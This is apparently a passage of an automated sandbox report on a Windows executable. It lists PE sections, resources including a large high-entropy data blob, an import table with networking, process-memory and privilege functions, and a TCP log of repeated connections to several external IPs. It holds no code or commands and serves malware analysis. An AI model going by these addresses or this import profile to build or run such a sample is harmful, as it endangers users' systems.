.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0xcdc80 | 0xcde00 | 672a93f6143d6b71bddbd92e4ca41f5c | False | 0.9680859137826351 | data | 7.9699440172587215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1a2000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0xc4f48 | data | | | 1.000317331244236
RT_GROUP_ICON | 0x1a1700 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1a1778 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1a178c | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1a17a0 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1a17b4 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1a1890 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Sep 16, 2024 09:31:05.710386992 CEST80558233.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:05.717672110 CEST5582380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:31:05.729437113 CEST5582380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:31:05.734261036 CEST80558233.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:07.242568016 CEST5582380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:31:07.247824907 CEST80558233.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:07.248075962 CEST5582380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:31:08.262123108 CEST5582480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:31:08.269114971 CEST80558243.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:08.269233942 CEST5582480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:31:08.282540083 CEST5582480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:31:08.289639950 CEST80558243.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:08.289688110 CEST80558243.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:08.289716005 CEST80558243.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:08.289741993 CEST80558243.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:08.289791107 CEST80558243.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:08.289818048 CEST80558243.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:08.289844990 CEST80558243.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:08.289870977 CEST80558243.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:08.289897919 CEST80558243.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:09.789352894 CEST5582480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:31:09.794771910 CEST80558243.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:09.797858000 CEST5582480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:31:10.808898926 CEST5582580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:31:10.813991070 CEST80558253.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:10.814076900 CEST5582580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:31:10.822659969 CEST5582580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:31:10.827522039 CEST80558253.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:11.291126013 CEST80558253.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:11.291203976 CEST80558253.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:11.291414022 CEST5582580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:31:11.297878027 CEST5582580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:31:11.304573059 CEST80558253.33.130.190192.168.2.4
                                  Sep 16, 2024 09:31:16.933315992 CEST5582680192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:16.939506054 CEST8055826156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:16.939646006 CEST5582680192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:16.951042891 CEST5582680192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:16.958209038 CEST8055826156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:17.924664021 CEST8055826156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:17.924732924 CEST5582680192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:18.461209059 CEST5582680192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:18.466195107 CEST8055826156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:19.480427027 CEST5582780192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:19.485337973 CEST8055827156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:19.485523939 CEST5582780192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:19.501806021 CEST5582780192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:19.506669044 CEST8055827156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:21.009424925 CEST5582780192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:21.055253983 CEST8055827156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:22.028724909 CEST5582880192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:22.033734083 CEST8055828156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:22.033823967 CEST5582880192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:22.048216105 CEST5582880192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:22.053100109 CEST8055828156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:22.053142071 CEST8055828156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:22.053153992 CEST8055828156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:22.053162098 CEST8055828156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:22.053200006 CEST8055828156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:22.053281069 CEST8055828156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:22.053291082 CEST8055828156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:22.053324938 CEST8055828156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:22.053333998 CEST8055828156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:23.555022001 CEST5582880192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:23.603264093 CEST8055828156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:24.574129105 CEST5582980192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:24.579170942 CEST8055829156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:24.579246044 CEST5582980192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:24.588167906 CEST5582980192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:24.593344927 CEST8055829156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:41.101263046 CEST8055827156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:41.101331949 CEST8055827156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:41.101427078 CEST5582780192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:41.101427078 CEST5582780192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:41.106268883 CEST8055827156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:43.373784065 CEST8055828156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:43.373944044 CEST5582880192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:45.952368021 CEST8055829156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:45.952493906 CEST5582980192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:45.953418970 CEST5582980192.168.2.4156.242.132.82
                                  Sep 16, 2024 09:31:45.958216906 CEST8055829156.242.132.82192.168.2.4
                                  Sep 16, 2024 09:31:51.181842089 CEST5583080192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:51.186676025 CEST8055830136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:51.190028906 CEST5583080192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:51.201567888 CEST5583080192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:51.206413031 CEST8055830136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:51.816766977 CEST8055830136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:51.816786051 CEST8055830136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:51.816806078 CEST8055830136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:51.816871881 CEST5583080192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:51.816984892 CEST5583080192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:52.711354017 CEST5583080192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:53.730010986 CEST5583180192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:53.737015009 CEST8055831136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:53.739474058 CEST5583180192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:53.751403093 CEST5583180192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:53.756563902 CEST8055831136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:54.363596916 CEST8055831136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:54.363715887 CEST8055831136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:54.363732100 CEST8055831136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:54.363786936 CEST5583180192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:54.363787889 CEST5583180192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:55.261720896 CEST5583180192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:56.277636051 CEST5583280192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:56.282713890 CEST8055832136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:56.282798052 CEST5583280192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:56.295933008 CEST5583280192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:56.300873041 CEST8055832136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:56.300889969 CEST8055832136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:56.300955057 CEST8055832136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:56.300967932 CEST8055832136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:56.300978899 CEST8055832136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:56.301047087 CEST8055832136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:56.301059008 CEST8055832136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:56.301079035 CEST8055832136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:56.301090956 CEST8055832136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:56.919030905 CEST8055832136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:56.919081926 CEST8055832136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:56.919157028 CEST5583280192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:57.805257082 CEST5583280192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:58.824239969 CEST5583380192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:58.829236984 CEST8055833136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:58.829307079 CEST5583380192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:58.837265968 CEST5583380192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:58.844737053 CEST8055833136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:59.435956955 CEST8055833136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:59.435981989 CEST8055833136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:59.435997963 CEST8055833136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:59.436173916 CEST5583380192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:59.436369896 CEST8055833136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:59.436384916 CEST8055833136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:59.436403990 CEST8055833136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:31:59.436506987 CEST5583380192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:59.436575890 CEST5583380192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:59.440788031 CEST5583380192.168.2.4136.143.186.12
                                  Sep 16, 2024 09:31:59.445703030 CEST8055833136.143.186.12192.168.2.4
                                  Sep 16, 2024 09:32:04.899890900 CEST5583480192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:04.904722929 CEST8055834199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:04.904808044 CEST5583480192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:04.916574955 CEST5583480192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:04.921359062 CEST8055834199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:05.500449896 CEST8055834199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:05.500610113 CEST8055834199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:05.500737906 CEST5583480192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:06.430079937 CEST5583480192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:07.449915886 CEST5583580192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:07.454915047 CEST8055835199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:07.455063105 CEST5583580192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:07.473736048 CEST5583580192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:07.478611946 CEST8055835199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:08.056215048 CEST8055835199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:08.056267977 CEST8055835199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:08.056339025 CEST5583580192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:08.977005005 CEST5583580192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:09.996170044 CEST5583680192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:10.001066923 CEST8055836199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:10.001142025 CEST5583680192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:10.014894009 CEST5583680192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:10.014921904 CEST5583680192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:10.019871950 CEST8055836199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:10.019885063 CEST8055836199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:10.019895077 CEST8055836199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:10.019908905 CEST8055836199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:10.019926071 CEST8055836199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:10.019936085 CEST8055836199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:10.019944906 CEST8055836199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:10.019953966 CEST8055836199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:10.019962072 CEST8055836199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:10.689867973 CEST8055836199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:10.689887047 CEST8055836199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:10.689944983 CEST5583680192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:11.525746107 CEST5583680192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:12.543406963 CEST5583780192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:12.548261881 CEST8055837199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:12.548336983 CEST5583780192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:12.556477070 CEST5583780192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:12.561227083 CEST8055837199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:13.167406082 CEST8055837199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:13.167435884 CEST8055837199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:13.167567015 CEST5583780192.168.2.4199.192.21.169
                                  Sep 16, 2024 09:32:13.171435118 CEST5583780192.168.2.4199.192.21.169
